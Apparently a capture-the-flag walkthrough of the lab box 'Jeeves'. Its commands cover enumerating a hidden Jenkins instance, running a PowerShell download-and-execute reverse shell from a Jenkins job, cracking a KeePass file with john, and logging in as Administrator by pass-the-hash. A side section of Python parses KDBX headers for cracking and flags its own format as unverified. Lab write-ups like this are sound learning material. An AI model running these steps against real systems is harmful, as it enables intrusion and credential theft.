2 :50000

===============================================================
2021/05/01 18:17:18 Starting gobuster in directory enumeration mode
===============================================================
/askjeeves            (Status: 302) [Size: 0] [--> http://10.10.10.63:50000/askjeeves/]

http://10.10.10.63:50000/askjeeves/
shows a Jenkins dashboard

Created a new job > Windows Batch Command
powershell iex (New-Object System.Net.WebClient).DownloadString('http://10.2.74.151:8888/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress 10.2.74.151 -Port 6969

PS C:\Users\Administrator\.jenkins\workspace\revshell>whoami
jeeves\kohsuke

whoami /priv
Privilege Name                Description                               State
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled

Note: SeImpersonatePrivilege is Enabled, which is the precondition for token-impersonation (potato-family) privilege escalation; not needed on this box because the admin hash turns up in the KeePass database below.

systeminfo
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.10586 N/A Build 10586
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                00331-20304-47406-AA297
Original Install Date:     10/25/2017, 4:45:33 PM
System Boot Time:          5/2/2021, 2:23:20 AM
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC


[idk why but eh why not; this is the admin password on Jenkins]
C:\Users\Administrator\.jenkins\secrets> more initialAdminPassword
ccd3bc435b3c4f80bea8acca28aec491

Found CEH.kdbx file under Documents

$ keepass2john CEH.kdbx > ceh.hash
$ john --wordlist=/usr/share/wordlists/rockyou.txt --format=KeePass ceh.hash
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 6000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES, 1=TwoFish, 2=ChaCha]) is 0 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
moonshine1       (CEH)
1g 0:00:00:09 DONE (2021-05-01 19:32) 0.1051g/s 5780p/s 5780c/s 5780C/s nick18..moonshine1
Use the "--show" option to display all of the cracked passwords reliably
Session completed

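Added example, not part of these notes: what keepass2john actually pulls out of a KDBX 3.x file. The "hash" john loads is not a hash at all but the outer header fields (AES-KDF transform rounds, which john reports as "Cost 1 (iteration count)", the two seeds, the IV, the expected first 32 plaintext bytes) plus the first 32 bytes of ciphertext; each candidate password is run through the KDF and checked by decrypting that one block. The sample header below is constructed, not a real database; the `$keepass$*2*...` line layout is written the way I recall keepass2john printing KDBX 3 files and should be diffed against the real tool's output before relying on it.

```python
import struct

# KDBX (KeePass 2.x) magic and the outer-header field IDs used by format 3.x
SIG1 = 0x9AA2D903
SIG2 = 0xB54BFB67
FIELD_NAMES = {
    0: "end_of_header", 1: "comment", 2: "cipher_id", 3: "compression_flags",
    4: "master_seed", 5: "transform_seed", 6: "transform_rounds",
    7: "encryption_iv", 8: "protected_stream_key", 9: "stream_start_bytes",
    10: "inner_random_stream_id",
}


def parse_kdbx3_header(blob: bytes) -> dict:
    """Parse the unencrypted outer header of a KDBX 3.x file.

    Cracking a candidate password then goes:
      composite   = SHA256(SHA256(password))                 (key file hashed in too, if any)
      transformed = SHA256(AES256-ECB(transform_seed)^rounds applied to composite)
      master_key  = SHA256(master_seed + transformed)
      plaintext   = AES256-CBC(master_key, encryption_iv).decrypt(first_block)
      candidate is right iff plaintext == stream_start_bytes
    """
    sig1, sig2, version = struct.unpack_from("<III", blob, 0)
    if sig1 != SIG1 or sig2 != SIG2:
        raise ValueError("not a KeePass 2.x (KDBX) file")
    major, minor = version >> 16, version & 0xFFFF
    if major != 3:
        raise ValueError(f"KDBX {major}.{minor}: v4 uses 32-bit field lengths and KdfParameters")
    fields, pos = {}, 12
    while True:
        field_id, size = struct.unpack_from("<BH", blob, pos)  # 1-byte id, uint16 LE length
        pos += 3
        data = blob[pos:pos + size]
        pos += size
        if field_id == 0:                                      # EndOfHeader: payload follows
            break
        fields[FIELD_NAMES.get(field_id, f"field_{field_id}")] = data
    return {
        "version": (major, minor),
        "transform_rounds": struct.unpack("<Q", fields["transform_rounds"])[0],
        "master_seed": fields["master_seed"],
        "transform_seed": fields["transform_seed"],
        "encryption_iv": fields["encryption_iv"],
        "stream_start_bytes": fields["stream_start_bytes"],
        "payload_offset": pos,
        "first_block": blob[pos:pos + 32],                     # first 32 ciphertext bytes
    }


def to_john_line(name: str, h: dict) -> str:
    # Assumption: field order as keepass2john prints it for KDBX 3
    # ($keepass$*2*rounds*offset*masterseed*transformseed*iv*startbytes*firstblock).
    return "{}:$keepass$*2*{}*{}*{}*{}*{}*{}*{}".format(
        name, h["transform_rounds"], h["payload_offset"],
        h["master_seed"].hex(), h["transform_seed"].hex(),
        h["encryption_iv"].hex(), h["stream_start_bytes"].hex(),
        h["first_block"].hex())


def build_sample_kdbx3(rounds: int = 6000) -> bytes:
    """Constructed sample (not a real database): repeated filler bytes stand in
    for the random seeds, IV, start bytes and ciphertext."""
    def tlv(fid, data):
        return struct.pack("<BH", fid, len(data)) + data
    hdr = struct.pack("<III", SIG1, SIG2, (3 << 16) | 1)                # KDBX 3.1
    hdr += tlv(2, bytes.fromhex("31c1f2e6bf714350be5805216afc5aff"))   # AES-256 cipher UUID
    hdr += tlv(3, struct.pack("<I", 1))                                  # gzip
    hdr += tlv(4, bytes([0x11]) * 32)                                    # master seed
    hdr += tlv(5, bytes([0x22]) * 32)                                    # transform seed
    hdr += tlv(6, struct.pack("<Q", rounds))                             # AES-KDF rounds
    hdr += tlv(7, bytes([0x33]) * 16)                                    # AES-CBC IV
    hdr += tlv(8, bytes([0x44]) * 32)                                    # protected stream key
    hdr += tlv(9, bytes([0x55]) * 32)                                    # expected start bytes
    hdr += tlv(10, struct.pack("<I", 2))                                 # Salsa20 inner stream
    hdr += tlv(0, b"\r\n\r\n")
    return hdr + bytes([0x66]) * 64                                      # fake payload


if __name__ == "__main__":
    print(to_john_line("CEH", parse_kdbx3_header(build_sample_kdbx3())))
```

With the default KeePass header layout the payload starts at offset 222, so the rounds count and the 222 are the two numbers you see right after `$keepass$*2*` in a typical john hash line; bumping the KDF rounds in KeePass is what makes each candidate proportionally slower to test.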
Found this under administrator: an LM:NT hash pair. The LM half aad3b435b51404eeaad3b435b51404ee is the constant for an empty/disabled LM hash, so only the NT half is a real credential, and it is all pass-the-hash needs:
aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00

$ pth-winexe -U Administrator%'aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00' //10.10.10.63 cmd.exe
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
jeeves\administrator

root.txt is hidden in an alternate data stream of hm.txt: dir /R lists the streams attached to a file, and PowerShell reads the named stream directly:
powershell Get-Content -Path "hm.txt" -Stream "root.txt"
